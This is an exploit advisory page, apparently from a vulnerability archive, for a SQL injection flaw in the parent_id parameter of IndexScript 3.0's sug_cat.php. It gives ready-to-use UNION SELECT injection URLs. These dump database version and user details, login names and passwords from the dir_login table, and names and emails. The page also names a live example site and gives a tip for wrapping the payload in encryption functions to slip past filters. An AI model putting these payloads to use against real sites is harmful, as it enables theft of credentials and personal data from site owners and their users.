IndexScript 3.0 (sug_cat.php parent_id) SQL Injection Vulnerability

2009.02.21
Credit: d3v1l
Risk: High
Local: No
Remote: Yes
CWE: CWE-89


Ogólna skala CVSS: 7.5/10
Znaczenie: 6.4/10
Łatwość wykorzystania: 10/10
Wymagany dostęp: Zdalny
Złożoność ataku: Niska
Autoryzacja: Nie wymagana
Wpływ na poufność: Częściowy
Wpływ na integralność: Częściowy
Wpływ na dostępność: Częściowy

[~]------------------------------------------------------------------------------------------------------------- [~] IndexScript v 3.0 [sug_cat.php?parent_id] - SQL injection Vulnerability [~] [~] http://www.indexscript.com/download.php [~] [~] [IndexScript is a feature-rich and yet easy-to-use directory script that you can install for immediate use.] [~] ------------------------------------------------------------------------------------------------------------ [~] Bug founded by d3v1l [Avram Marius] [~] [~] Date: 12.10.2008 [~] [~] [~] d3v1l@spoofer.com http://security-sh3ll.com [~] [~] ------------------------------------------------------------------------------------------------------------ [~] Greetz tO ALL:- [~] [~] Security-Shell Members ( http://security-sh3ll.com/forum.php ) [~] [~] Pentest| Gibon| Pig AND milw0rm staff [~]------------------------------------------------------------------------------------------------------------- [~] Exploit :- [~] [~] http://site.com/sug_cat.php?parent_id=-1 UNION SELECT concat_ws(0x3a,version(),database(),user())-- [~] [~] http://site.com/sug_cat.php?parent_id=-1 UNION ALL SELECT login,password FROM dir_login-- [~] [~] http://site.com/sug_cat.php?parent_id=-1 UNION ALL SELECT name,email FROM dir_pend_cat-- [~] [~] Example :- [~] [~] http://spaceho.com/sug_cat.php?parent_id=SQL [~]------------------------------------------------------------------------------------------------------------- [~] btw; on some sites you need to encript your injection like [-1 UNION SELECT aes_decrypt(aes_encrypt(concat] [~]-------------------------------------------------------------------------------------------------------------


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top